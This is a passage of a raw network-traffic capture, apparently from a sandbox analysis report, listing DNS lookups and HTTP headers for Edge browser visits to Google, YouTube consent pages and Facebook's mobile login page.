          content-security-policy: script-src 'unsafe-inline' https: http:;object-src 'none';base-uri 'self';report-uri /v3/signin/_/AccountsSignInUi/cspreport;worker-src 'self'
          content-security-policy: require-trusted-types-for 'script';report-uri /v3/signin/_/AccountsSignInUi/cspreport
          permissions-policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
          cross-origin-resource-policy: same-site
          report-to: {"group":"AccountsSignInUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/AccountsSignInUi"}]}
          accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
          reporting-endpoints: default="/v3/signin/_/AccountsSignInUi/web-reports?context=eJzjWsKoxSXF4KkhxbBHaReTY-wTJlcgntv9lGkhEC9__5RpNRDHrHrGlADEB-OeMx0F4rcJL5g-AnFr6wumTiDe3POCaTsQT-N5yTQLiI9sf8l0AojffXnJxPH1JZMEEKsBMd-66awqQKy5fjprIBDL_5rOqgzETukzWAOA2Kd-BmsUELfePMc6GYiT_p1nLQBiIR6Og5f3bGAT2DBv4U0mAMu3UkA"
          content-encoding: gzip
          server: ESF
          x-xss-protection: 0
          x-content-type-options: nosniff
          alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
        • flag-us
          DNS
          consent.youtube.com
          MicrosoftEdgeCP.exe
          Remote address:
          8.8.8.8:53
          Request
          consent.youtube.com
          IN A
          Response
          consent.youtube.com
          IN A
          216.58.204.78
        • flag-gb
          GET
          https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3Fcbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
          MicrosoftEdgeCP.exe
          Remote address:
          216.58.204.78:443
          Request
          GET /m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3Fcbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 HTTP/2.0
          host: consent.youtube.com
          accept: text/html, application/xhtml+xml, image/jxr, */*
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          cookie: SOCS=CAAaBgiA27ewBg; YSC=DkVMqqSg6aI; __Secure-YEC=CgtQNnJwdFpkbnY2RSjB07ywBjIKCgJHQhIEGgAgPg%3D%3D; VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgPg%3D%3D
          Response
          HTTP/2.0 302
          content-type: application/binary
          vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
          cache-control: no-cache, no-store, max-age=0, must-revalidate
          pragma: no-cache
          expires: Mon, 01 Jan 1990 00:00:00 GMT
          date: Thu, 04 Apr 2024 22:29:21 GMT
          location: https://consent.youtube.com/ml?continue=https://www.youtube.com/account?cbrd%3D1&gl=GB&hl=en&cm=2&pc=yt&src=1
          cross-origin-opener-policy: unsafe-none
          content-security-policy: require-trusted-types-for 'script';report-uri /_/ConsentUi/cspreport
          content-security-policy: script-src 'unsafe-inline' https: http:;object-src 'none';base-uri 'self';report-uri /_/ConsentUi/cspreport;worker-src 'self'
          permissions-policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
          accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
          cross-origin-resource-policy: same-site
          server: ESF
          content-length: 0
          x-xss-protection: 0
          x-frame-options: SAMEORIGIN
          x-content-type-options: nosniff
          alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
        • flag-gb
          GET
          https://consent.youtube.com/ml?continue=https://www.youtube.com/account?cbrd%3D1&gl=GB&hl=en&cm=2&pc=yt&src=1
          MicrosoftEdgeCP.exe
          Remote address:
          216.58.204.78:443
          Request
          GET /ml?continue=https://www.youtube.com/account?cbrd%3D1&gl=GB&hl=en&cm=2&pc=yt&src=1 HTTP/2.0
          host: consent.youtube.com
          accept: text/html, application/xhtml+xml, image/jxr, */*
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          cookie: SOCS=CAAaBgiA27ewBg; YSC=DkVMqqSg6aI; __Secure-YEC=CgtQNnJwdFpkbnY2RSjB07ywBjIKCgJHQhIEGgAgPg%3D%3D; VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgPg%3D%3D
          Response
          HTTP/2.0 200
          content-type: text/html; charset=utf-8
          vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
          cache-control: no-cache, no-store, max-age=0, must-revalidate
          pragma: no-cache
          expires: Mon, 01 Jan 1990 00:00:00 GMT
          date: Thu, 04 Apr 2024 22:29:21 GMT
          cross-origin-resource-policy: same-site
          content-security-policy: script-src 'unsafe-inline' https: http:;object-src 'none';base-uri 'self';report-uri /_/ConsentHttp/cspreport;worker-src 'self'
          content-security-policy: require-trusted-types-for 'script';report-uri /_/ConsentHttp/cspreport
          accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
          permissions-policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
          cross-origin-opener-policy: unsafe-none
          reporting-endpoints: default="/_/ConsentHttp/web-reports?context=eJzj8tHikmJw1pBiiPr4nOndl5dMAl9fMkkAsRYQ862bzqoCxIbrp7NGArFT-gzWECD2qZ_BGgfErTfPsU4H4qR_51lLgFiIh-Pg5T0b2AR2zPj-jhEAkc0m4w"
          content-encoding: gzip
          server: ESF
          x-xss-protection: 0
          x-frame-options: SAMEORIGIN
          x-content-type-options: nosniff
          alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
        • flag-us
          DNS
          14.180.250.142.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          14.180.250.142.in-addr.arpa
          IN PTR
          Response
          14.180.250.142.in-addr.arpa
          IN PTR
          lhr25s32-in-f141e100net
        • flag-us
          DNS
          84.15.177.108.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          84.15.177.108.in-addr.arpa
          IN PTR
          Response
          84.15.177.108.in-addr.arpa
          IN PTR
          wr-in-f841e100net
        • flag-us
          DNS
          227.16.217.172.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          227.16.217.172.in-addr.arpa
          IN PTR
          Response
          227.16.217.172.in-addr.arpa
          IN PTR
          lhr48s28-in-f31e100net
          227.16.217.172.in-addr.arpa
          IN PTR
          mad08s04-in-f3�H
        • flag-us
          DNS
          www.google.com
          MicrosoftEdge.exe
          Remote address:
          8.8.8.8:53
          Request
          www.google.com
          IN A
          Response
          www.google.com
          IN A
          142.250.200.36
        • flag-gb
          GET
          https://www.google.com/favicon.ico
          MicrosoftEdge.exe
          Remote address:
          142.250.200.36:443
          Request
          GET /favicon.ico HTTP/2.0
          host: www.google.com
          accept: */*
          accept-encoding: gzip, deflate, br
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          dnt: 1
          Response
          HTTP/2.0 200
          accept-ranges: bytes
          content-encoding: gzip
          cross-origin-resource-policy: cross-origin
          cross-origin-opener-policy-report-only: same-origin; report-to="static-on-bigtable"
          report-to: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]}
          content-length: 1494
          x-content-type-options: nosniff
          server: sffe
          x-xss-protection: 0
          date: Thu, 04 Apr 2024 22:19:58 GMT
          expires: Fri, 12 Apr 2024 22:19:58 GMT
          cache-control: public, max-age=691200
          last-modified: Tue, 22 Oct 2019 18:30:00 GMT
          content-type: image/x-icon
          vary: Accept-Encoding
          age: 564
          alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
        • flag-us
          DNS
          m.facebook.com
          MicrosoftEdgeCP.exe
          Remote address:
          8.8.8.8:53
          Request
          m.facebook.com
          IN A
          Response
          m.facebook.com
          IN CNAME
          star-mini.c10r.facebook.com
          star-mini.c10r.facebook.com
          IN A
          157.240.210.35
        • flag-de
          GET
          https://m.facebook.com/video?_rdr
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.35:443
          Request
          GET /video?_rdr HTTP/2.0
          host: m.facebook.com
          accept: text/html, application/xhtml+xml, image/jxr, */*
          referer: https://www.facebook.com/video
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 302
          location: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
          cross-origin-opener-policy: same-origin-allow-popups;report-to="coop_report"
          accept-ch-lifetime: 4838400
          accept-ch: viewport-width,dpr,Sec-CH-Prefers-Color-Scheme,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Platform-Version,Sec-CH-UA-Model
          content-type: text/html; charset=utf-8
          strict-transport-security: max-age=15552000; preload; includeSubDomains
          x-fb-debug: gs9bmVsM9mmVEAEpqKhb9+wg44d1Y+4zYcW6W/ZvDQ/IUNJcu3bjXqhnDH7dygwEzuaOi+PEs6NOEtB/4Y4iBQ==
          content-length: 0
          date: Thu, 04 Apr 2024 22:29:22 GMT
          x-fb-connection-quality: EXCELLENT; q=0.9, rtt=49, rtx=0, c=10, mss=1357, tbw=3397, tp=-1, tpl=-1, uplat=50, ullat=0
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.35:443
          Request
          GET /login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr HTTP/2.0
          host: m.facebook.com
          accept: text/html, application/xhtml+xml, image/jxr, */*
          referer: https://www.facebook.com/video
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://m.facebook.com/ajax/mtouch_error_reports/?device_level=unknown", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
          report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/m.facebook.com\/ajax\/mtouch_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(self), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(self), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(self), gyroscope=(self), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(self), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: same-origin
          cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
          cross-origin-opener-policy: unsafe-none;report-to="coop_report"
          pragma: no-cache
          cache-control: private, no-cache, no-store, must-revalidate
          expires: Sat, 01 Jan 2000 00:00:00 GMT
          x-content-type-options: nosniff
          x-xss-protection: 0
          x-frame-options: DENY
          accept-ch-lifetime: 4838400
          accept-ch: viewport-width,dpr,Sec-CH-Prefers-Color-Scheme,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Platform-Version,Sec-CH-UA-Model
          content-type: text/html; charset=utf-8
          strict-transport-security: max-age=15552000; preload; includeSubDomains
          x-fb-debug: neA8E8QjzhxSlfd6dkJgSGFEp8V2aoX6NVj+2pxOqpjPO64K0XdHVtcth7jJ6IVVG44/zXlhE0Xd+tsruFch9g==
          date: Thu, 04 Apr 2024 22:29:22 GMT
          x-fb-connection-quality: EXCELLENT; q=0.9, rtt=49, rtx=0, c=10, mss=1357, tbw=4074, tp=-1, tpl=-1, uplat=142, ullat=0
          alt-svc: h3=":443"; ma=86400
        • flag-de
          POST
          https://m.facebook.com/a/bz?fb_dtsg=NAcOBR-pIHoUcjZPpLdhbvbB_jXY6aiKWxhBNPOHAS7ZAgJdqTiQzcQ%3A0%3A0&jazoest=25041&lsd=AVoK_ucW--w&__dyn=1KQdAG1mws8-t0BBBzEnwuo98nwgU2owpUuwcC4o1nEhwem0iy1gCwjE1xoswaq1Jw20Ehw73wwyo36wdq0ny1Aw4vw8W0iW220jG3qaw4kwbS1Lw9C0hO3q0ue&__csr=&__req=1&__fmt=1&__a=AYmUA91xKfid9CUinRY4SZf-szXYW20SyXaY18Sbdpi12jL4HuyVR7lzCjl0CsNiIIpHrT6QwUu-rpo9P9JUXugWFzG_AgGamNqOurr9GUp4kQ&__user=0
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.35:443
          Request
          POST /a/bz?fb_dtsg=NAcOBR-pIHoUcjZPpLdhbvbB_jXY6aiKWxhBNPOHAS7ZAgJdqTiQzcQ%3A0%3A0&jazoest=25041&lsd=AVoK_ucW--w&__dyn=1KQdAG1mws8-t0BBBzEnwuo98nwgU2owpUuwcC4o1nEhwem0iy1gCwjE1xoswaq1Jw20Ehw73wwyo36wdq0ny1Aw4vw8W0iW220jG3qaw4kwbS1Lw9C0hO3q0ue&__csr=&__req=1&__fmt=1&__a=AYmUA91xKfid9CUinRY4SZf-szXYW20SyXaY18Sbdpi12jL4HuyVR7lzCjl0CsNiIIpHrT6QwUu-rpo9P9JUXugWFzG_AgGamNqOurr9GUp4kQ&__user=0 HTTP/2.0
          host: m.facebook.com
          accept: */*
          origin: https://m.facebook.com
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          x-response-format: JSONStream
          x-requested-with: XMLHttpRequest
          x-fb-lsd: AVoK_ucW--w
          x-asbd-id: 129477
          x-fb-background-state: 1
          content-type: multipart/form-data; boundary=---------------------------7e8841830294
          accept-encoding: gzip, deflate, br
          content-length: 916
          cache-control: no-cache
          Response
          HTTP/2.0 200
          content-encoding: br
          reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://m.facebook.com/ajax/mtouch_error_reports/?device_level=unknown", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
          report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/m.facebook.com\/ajax\/mtouch_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(self), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(self), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(self), gyroscope=(self), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(self), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: same-origin
          cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
          cross-origin-opener-policy: same-origin-allow-popups;report-to="coop_report"
          pragma: no-cache
          cache-control: private, no-cache, no-store, must-revalidate
          expires: Sat, 01 Jan 2000 00:00:00 GMT
          x-content-type-options: nosniff
          x-xss-protection: 0
          x-frame-options: DENY
          access-control-expose-headers: X-FB-Debug, X-Loader-Length, X-Stack
          access-control-allow-methods: OPTIONS
          access-control-allow-credentials: true
          access-control-allow-origin: https://m.facebook.com
          vary: Origin
          vary: Accept-Encoding
          accept-ch-lifetime: 4838400
          accept-ch: viewport-width,dpr,Sec-CH-Prefers-Color-Scheme,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Platform-Version,Sec-CH-UA-Model
          content-type: application/x-javascript; charset=utf-8
          strict-transport-security: max-age=15552000; preload; includeSubDomains
          x-fb-debug: jXXAlsjRL9pTcZgXsi36TYekvevCissu4aLCHf5K5PuUo8IcqYlZWOsIpSf5BCMflhMtwcx0UatWHlJT0XpUxg==
          date: Thu, 04 Apr 2024 22:29:25 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=50, rtx=0, c=10, mss=1357, tbw=30079, tp=-1, tpl=-1, uplat=188, ullat=145
          alt-svc: h3=":443"; ma=86400
        • flag-de
          POST
          https://m.facebook.com/a/bz?fb_dtsg=NAcOBR-pIHoUcjZPpLdhbvbB_jXY6aiKWxhBNPOHAS7ZAgJdqTiQzcQ%3A0%3A0&jazoest=25041&lsd=AVoK_ucW--w&__dyn=1KQdAG1mws8-t0BBBzEnwuo98nwgU2owpUuwcC4o1nEhwem0iy1gCwjE1xoswaq1Jw20Ehw73wwyo36wdq0ny1Aw4vw8W0iW220jG3qaw4kwbS1Lw9C0hO3q0ue&__csr=&__req=2&__fmt=1&__a=AYmUA91xKfid9CUinRY4SZf-szXYW20SyXaY18Sbdpi12jL4HuyVR7lzCjl0CsNiIIpHrT6QwUu-rpo9P9JUXugWFzG_AgGamNqOurr9GUp4kQ&__user=0
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.35:443
          Request
          POST /a/bz?fb_dtsg=NAcOBR-pIHoUcjZPpLdhbvbB_jXY6aiKWxhBNPOHAS7ZAgJdqTiQzcQ%3A0%3A0&jazoest=25041&lsd=AVoK_ucW--w&__dyn=1KQdAG1mws8-t0BBBzEnwuo98nwgU2owpUuwcC4o1nEhwem0iy1gCwjE1xoswaq1Jw20Ehw73wwyo36wdq0ny1Aw4vw8W0iW220jG3qaw4kwbS1Lw9C0hO3q0ue&__csr=&__req=2&__fmt=1&__a=AYmUA91xKfid9CUinRY4SZf-szXYW20SyXaY18Sbdpi12jL4HuyVR7lzCjl0CsNiIIpHrT6QwUu-rpo9P9JUXugWFzG_AgGamNqOurr9GUp4kQ&__user=0 HTTP/2.0
          host: m.facebook.com
          accept: */*
          origin: https://m.facebook.com
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          x-response-format: JSONStream
          x-requested-with: XMLHttpRequest
          x-fb-lsd: AVoK_ucW--w
          x-asbd-id: 129477
          x-fb-background-state: 1
          content-type: multipart/form-data; boundary=---------------------------7e82293630294
          accept-encoding: gzip, deflate, br
          content-length: 5470
          cache-control: no-cache
          Response
          HTTP/2.0 200
          content-encoding: br
          reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://m.facebook.com/ajax/mtouch_error_reports/?device_level=unknown", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
          report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/m.facebook.com\/ajax\/mtouch_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(self), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(self), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(self), gyroscope=(self), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(self), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: same-origin
          cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
          cross-origin-opener-policy: same-origin-allow-popups;report-to="coop_report"
          pragma: no-cache
          cache-control: private, no-cache, no-store, must-revalidate
          expires: Sat, 01 Jan 2000 00:00:00 GMT
          x-content-type-options: nosniff
          x-xss-protection: 0
          x-frame-options: DENY
          access-control-expose-headers: X-FB-Debug, X-Loader-Length, X-Stack
          access-control-allow-methods: OPTIONS
          access-control-allow-credentials: true
          access-control-allow-origin: https://m.facebook.com
          vary: Origin
          vary: Accept-Encoding
          accept-ch-lifetime: 4838400
          accept-ch: viewport-width,dpr,Sec-CH-Prefers-Color-Scheme,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Platform-Version,Sec-CH-UA-Model
          content-type: application/x-javascript; charset=utf-8
          strict-transport-security: max-age=15552000; preload; includeSubDomains
          x-fb-debug: Xd2b2lB1WxjwDON46u90wk4mUz503zR/LlNUIsaUvTh00mlMAqCSVXhMFNaCPrfM9VtWrMOrbdU7Gsz2i0BQag==
          date: Thu, 04 Apr 2024 22:29:55 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=50, rtx=0, c=10, mss=1357, tbw=31042, tp=-1, tpl=-1, uplat=44, ullat=1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          POST
          https://m.facebook.com/a/bz?fb_dtsg=NAcOBR-pIHoUcjZPpLdhbvbB_jXY6aiKWxhBNPOHAS7ZAgJdqTiQzcQ%3A0%3A0&jazoest=25041&lsd=AVoK_ucW--w&__dyn=1KQdAG1mws8-t0BBBzEnwuo98nwgU2owpUuwcC4o1nEhwem0iy1gCwjE1xoswaq1Jw20Ehw73wwyo36wdq0ny1Aw4vw8W0iW220jG3qaw4kwbS1Lw9C0hO3q0ue&__csr=&__req=3&__fmt=1&__a=AYmUA91xKfid9CUinRY4SZf-szXYW20SyXaY18Sbdpi12jL4HuyVR7lzCjl0CsNiIIpHrT6QwUu-rpo9P9JUXugWFzG_AgGamNqOurr9GUp4kQ&__user=0
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.35:443
          Request
          POST /a/bz?fb_dtsg=NAcOBR-pIHoUcjZPpLdhbvbB_jXY6aiKWxhBNPOHAS7ZAgJdqTiQzcQ%3A0%3A0&jazoest=25041&lsd=AVoK_ucW--w&__dyn=1KQdAG1mws8-t0BBBzEnwuo98nwgU2owpUuwcC4o1nEhwem0iy1gCwjE1xoswaq1Jw20Ehw73wwyo36wdq0ny1Aw4vw8W0iW220jG3qaw4kwbS1Lw9C0hO3q0ue&__csr=&__req=3&__fmt=1&__a=AYmUA91xKfid9CUinRY4SZf-szXYW20SyXaY18Sbdpi12jL4HuyVR7lzCjl0CsNiIIpHrT6QwUu-rpo9P9JUXugWFzG_AgGamNqOurr9GUp4kQ&__user=0 HTTP/2.0
          host: m.facebook.com
          accept: */*
          origin: https://m.facebook.com
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          x-response-format: JSONStream
          x-requested-with: XMLHttpRequest
          x-fb-lsd: AVoK_ucW--w
          x-asbd-id: 129477
          x-fb-background-state: 1
          content-type: multipart/form-data; boundary=---------------------------7e82583630294
          accept-encoding: gzip, deflate, br
          content-length: 921
          cache-control: no-cache
          Response
          HTTP/2.0 200
          content-encoding: br
